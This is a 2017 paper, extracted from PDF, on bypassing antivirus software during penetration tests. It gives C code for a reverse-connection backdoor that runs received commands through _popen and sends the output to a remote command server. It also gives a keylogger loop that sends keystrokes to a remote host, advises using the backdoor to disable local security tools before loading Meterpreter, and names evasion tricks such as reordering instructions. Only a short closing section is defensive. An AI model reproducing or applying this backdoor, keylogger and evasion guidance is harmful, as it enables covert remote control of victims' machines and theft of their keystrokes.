Bypass an antivirus: too simple Trivial Techniques for Evading and Solutions to Defend Author: Stefano Gorresio Date: 04 May 2017 1 Index 1)Premise................................................................................................................3 2)Testing Environment............................................................................................4 3)Introduction.........................................................................................................5 4)There are more ways to solve the same problem................................................5 5)Examples..............................................................................................................8 a)Executable Backdoor........................................................................................8 b)Remote Keylogger..........................................................................................11 c)Script Malware...............................................................................................13 6)Conclusion..........................................................................................................15 a)Techniques for evade AV................................................................................15 b)Techniques for defense...................................................................................15 7)Note....................................................................................................................17 2 1) Premise This document is not exhaustive; it is intended to only show how an antivirus can not be effective in a lot of situations. This topic is described in a very superficial way. This is not a complete guide that illustrates AV evasion techniques, but only a cognitive document. This document is a report of many tests made by me over the years. Everything that is written in this document has been tested several times. Any tests done, will be illustrated in order to be playable by anyone. This simple analysis does not claim to not use antivirus... in fact, the antivirus must be used, but should not be considered a complete and exhaustive defense system. The content that will be expose in this paper is not anything new, but by analysis made and how people and companies have "strange ideas" about computer security, it seemed right publish some considerations. These malware will also be simple and obvious, but as tested, they are revealed fully functional in some penetration test. The full source code of these malware are not public for now. This document was written for cognitive and didactic reasons. I apologize if my english is bad. XD 3 2) Testing Environment All target are computer with Microsoft Windows (Windows 10 and Windows Server 2016) and all attacker are computer with GNU/Linux (Arch Linux and Kali Linux). The malware are tested on VirusTotal service and directly on Windows Defender, Avira and McAfee (trial version). Other test are done occasionally on Sophos. The malware are programmed for Windows in C (compiled with gcc) and in Assembly x86, x86_64 (compiled with FASM) and the server/client C&C are programmed in Python 2.7 (working also on Windows). These analyzes were performed in a distributed and not continuous way from 2012 (the year when I became interested in malware) to date. Below is the list of malware programmed (or downloaded) and used for testing: • • • • BackDoor17: Reverse connection backdoor programmed in C for Microsoft Windows. Execute cmd and powershell commands to remote. RemoteKeylogger: Bind connection keylogger programmed in Assembly x86 (32 bit exe) for Microsoft Windows. Send key pressed to remote host. RemoteKeylogger17: Reverse connection keylogger programmed in C for Microsoft Windows. Send key pressed to remote server. Porting of a keylogger programmed in 2014 (RemoteKeylogger). Metasploit Payloads: Payloads (ex. reverse shell) included in the Metasploit Framework. Some of these programs have been programmed for tests and are not fully adequate for a penetration test (although they can be used without problems). 4 3) Introduction Many people and companies are convinced that the security IT can only be managed with the use of a good antivirus. Furthermore, there is a common belief that a malware that can evade AV must be a complex, advanced software, polymorphic, smart, etc. Wrong… The best way to bypass an antivirus is the simplicity and banality in programming. Usually, the malware are stupid programs that do simple things like run commands, connect remotely, replicate, and so on. If a malware acts like a regular program, the AV does not deem malicious. 4) There are more ways to solve the same problem Make an example... Most of the reverse shell that can be found on the internet, are easily detected by AV. But if we want to use a reverse shell on a server with Windows Server (unfortunately the most used operating system for servers in Italy) with an antivirus which performs its job well with backdoor, what can we do? The first question to ask is: what I want exactly? A reverse shell (in any form) is usually used to execute shell commands remotely and see the output of the commands sent. The problem may so change from "how do I run a reverse shell?" to "how do I execute commands remotely and see the output?". The problem is the same, but honestly I find more convenient to ask the question in another way. 5 Instead of using a reverse shell already programmed, we try to program it in C. Many reverse shell for Microsoft Windows work like this: 1. Initialize and create socket 2. Connect to server C&C (host attacker or specifically dedicated server) 3. Execute CreateProcess function with cmd.exe and with redirected stdin, stdout and stderr on socket The third point is that which could give serious problems. Create a connection to a host is not malicious, but run cmd.exe redirecting "the flow" on the socket just created is quite suspect. Note: the antivirus does not tend to analyze only a single part of a code, but they tend to analyze everything. An antivirus can consider a call to an API suspected or harmless, also on the basis, for example, to calls or to operations carried out previously. To achieve our goal, is it mandatory to use CreateProcess, launch cmd.exe and attach the socket? Thankfully (or misfortune) no. We can trivially try making the following reasoning: What should do our program? It must connect to a remote host, receive commands (receiving data), execute shell commands locally and send the output (send data). What can we already do without any problems? We can connect to a remote host and send and receive data. What are we missing? Running shell commands locally. The problem then becomes "how do I execute shell commands locally and save the output in a buffer (for subsequent transfer)?". 6 The answer is found in _popen function.1 FILE *pipe = _popen(char *command, “rt”); pipe = output (data that will be sent) command = input (received data) Now we just have to connect everything. uint8_t esegui(FILE *pipe, char *data, SOCKET s){ char *data_pt = data; if((pipe=_popen(data, "rt")) == NULL) return 1; while(fgets(data_pt, MAX_SIZE, pipe)) if(send(s, data, strlen(data), 0) < 0) return 1; // Execute Command // Send Output _pclose(pipe); return 0; } For each command received, are sent multiple outputs (one line at a time is sent). This code works, but it is not optimized.2 But for us this is enough. … Our backdoor programmed in C works and the antivirus is not a problem. The reasoning and the work done are stupid, but very effective. It's true! We have realized a simple backdoor… but the procedure for programming a complex persistent backdoor, with encrypted connection, able to handle all the exceptions and be "robust at all", does not change. I confirm what many people say ... The best solution is the simplest and banal. 7 5) Examples a) Executable Backdoor A backdoor is a program that allows access to a system ignoring any authentications, etc. They are usually programs that allow the execution of shell commands remotely, often managing the remote connection (a webshell does not handle the connection). A good backdoor must be undetectable (by AV and humans), should be able to handle all exceptions (especially on sockets), communication between the target and the attacker must be cryptographically secure (carrying confidential data across the Internet in clear during a penetration test is not very nice) and must be persistent (for long-term access). I personally prefer "reverse" connections (from target to attackers) simply because they are the least annoying to manage, and I noticed that they tend to be less detectable. BackDoor17 is a reverse connection backdoor programmed in C that allows the execution of arbitrary commands on Microsoft Windows. The program netcat is sufficient and great for controlling the backdoor. The connection is not encrypted. This backdoor is not projected for long-term access. When this backdoor is performed, tries to connect to a TCP socket specified in the programming phase. At each connection closing (or any connection problem), the program will lock for a number of seconds (I have set to 30 seconds) before trying to reconnect. The following are the commands that you can perform: <command> powershell <command> exit kill Windows cmd.exe commands Powershell commands Close connection (retry after 30 seconds) Kill backdoor (terminate process) 8 To handle the connection are being used API Winsock2. To execute shell commands is used _popen function. Create a connection to a host is not malevolent action. Perform _popen function is not malevolent action. The whole is not detected malicious. This backdoor is very useful as a "backdoor first access". By running this backdoor on Windows Server with sufficient permission you can easily disable the local security systems (antivirus, agent, etc.) and then load a backdoor most powerful and detectable (ex. Meterpreter). 9 Note: The > character is optional and indicates when typing the command. 10 b) Remote Keylogger A keylogger is a program that intercepts keystrokes and stores them in a file or send them to a remote server. In my research, I programmed and analyzed two keylogger with the same "capture" operation, but programmed differently and with different connection management. RemoteKeylogger is a bind connection keylogger and it has been programmed in Assembly x86 (32 bit). It, on virustotal, was detected from 6/59 AV. I programmed it in 2014. RemoteKeylogger17 is a reverse connection keylogger and it has been programmed in C (64 bit). It, on virustotal, was detected from 1/61 AV. In both keylogger, the algorithm of "capture keys" is the same, but change the machine instructions, the architecture and the type of connection. The call to the API is the same in both. netcat is a great client/server. The code of the socket management is identical for RemoteKeylogger17 and for BackDoor17. Once that happens a data transmission fault, RemoteKeylogger17 wait a defined time (30 seconds) before try again to connect to the server. To capture keystrokes, the GetAsyncKeyState function has been used to check if a specific key has been pressed at that instant. Every 80 milliseconds is performed a scan on some keys of interest (letters, numbers, shift, space, enter, etc.) and if at that time, a button has been pressed, it sent to remote server the key encoded in ASCII. This is the classic behavior of many of the keylogger on Windows.3 11 Below, a part of the RemoteKeylogger17 code that checks the keys with the virtual-key code from 48 (0x30) to 90 (0x5A). for(i=0x30; i<0x5B; i++) if(GetAsyncKeyState(i)){ // Check if the button is pressed str_pt[0] = i; if(send(s, str_pt, 1, 0) < 0) return; } The entire code must be obviously improved. i is a uint8_t str_pt is a *char s is a SOCKET 12 Note: Since as can be seen in the figure above, it should be properly adjust the timeout after the detection of a pressed key (single sleep of 80 ms). The ^ character indicates the Shift pressure. c) Script Malware Many malware are simple scripts (ex. webshell, VBS, bash, etc.). The malware scripts are usually less detectable than the others. Let's take an example. At the same payload (ex. windows/x64/meterpreter/reverse_https of Metasploit Framework), a VBS is less detectable that an executable exe. 13 The webshell are less detectable. Note: It’s true, an aspx code is not really a script (it is compiled), but from a "malware" point of view it looks more like a script than an executable (what it actually is): from an attacker's point of view it is treated as a script (load source code not executable code) and antivirus seems to see it as a script (the detection probabilities are almost identical to those of a script). 14 6) Conclusion a) Techniques for evade AV In a penetration test, personally, I always prefer to use the script backdoor. On Windows, as the first access backdoor, I recommend using powershell script (less detectable of the VBS script). On UNIX-like systems, such as first access backdoor, I recommend the use of sh script (I do not recommend immediate use of bash and python, are not always present). As webshell, I recommend the use of controllable script directly from browser (I do not recommend the use of reverse shell, more detectable and more problems on any firewall). If a code is detected by an antivirus, the simplest technique to evade an AV is trying to change the instructions, the order of them, or the parameters passed to the API. The antivirus analyze the instructions and calls to the API, not the algorithm. b) Techniques for defense To defend against malware, the antivirus use is not enough. In computer security, it is important one thing that many people and many companies do not have: the good sense. It is useless to have antivirus, IDS, "enterprise support" to exaggerated cost, when you leave the credentials (ex. pfsense, server admin, etc.) to the default values or easily detectable (the most stupid and widespread security hole). The common replicating malware do not replicate through buffer overflows, 0 day, or through complicated methods; simply replicate through shared media, specific mechanisms using default credentials or other simple mechanisms left open (almost always for laziness and not by necessity). 15 I am convinced that a network must be minimal: it must be modular with the bare minimum. It is useless to have a heavy operating system, with thousands of processes for a variety of things, when at last you use it only as a file server or web server. The most common result is to have unstable servers, underperforming that require monstrous hardware to do things that would require also only a Raspberry PI (I exaggerate, but the reality is not much different). These problems, of course, increase information security risks: too many minimally monitored unnecessary services and especially too much freedom of movement, increase the probability that malware can operate without problems (as well as to allow more facilitated cyber attacks). … All that I have written is obvious, but for many companies and people do not seem be to all. In conclusion... the antivirus is important (sometimes plays an important role on computer security), but if you want to use IT infrastructure also for critical activities, make sure you know well all that you do (for example how work the software that you are using), and above all take great care in computer security (cyber security also deals with the robustness of information, not only with its confidentiality). 16 7) Note This paper should be used only for educational purposes, analysis and any purpose that goes not to violate any applicable law. Some screenshots were taken on systems set on the italian language and some imges will have text in italian. 1 On internet there are many backdoor’s codes with this functioning. 2 This code was taken from BackDoor17. 3 On internet, you can find many similar codes. 17